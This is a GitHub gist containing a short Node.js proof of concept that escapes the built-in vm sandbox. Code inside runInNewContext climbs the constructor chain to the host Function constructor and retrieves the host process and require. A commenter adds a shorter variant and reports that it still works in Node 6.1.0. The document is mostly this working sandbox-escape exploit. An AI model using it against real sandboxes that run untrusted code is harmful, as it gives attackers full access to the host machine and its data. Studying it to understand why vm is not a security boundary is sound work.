Skip to content

Instantly share code, notes, and snippets.

Created August 17, 2015 20:20
  • Star 15 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
Star You must be signed in to star a gist
What would you like to do?
Escaping the vm sandbox
"use strict";
const vm = require("vm");
const sandbox = { anObject: {} };
const whatIsThis = vm.runInNewContext(`
const ForeignObject = anObject.constructor;
const ForeignFunction = ForeignObject.constructor;
const process = ForeignFunction("return process")();
const require = process.mainModule.require;
`, sandbox);
Copy link

NiXXeD commented May 13, 2016

Technically you can also just do:
const ForeignFunction = this.constructor.constructor;
since the context object itself is created in the context you want. You don't even need a foreign object.

Also, this still appears to be an issue in Node 6.1.0. Just tested this for a silly Hubot script we have.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment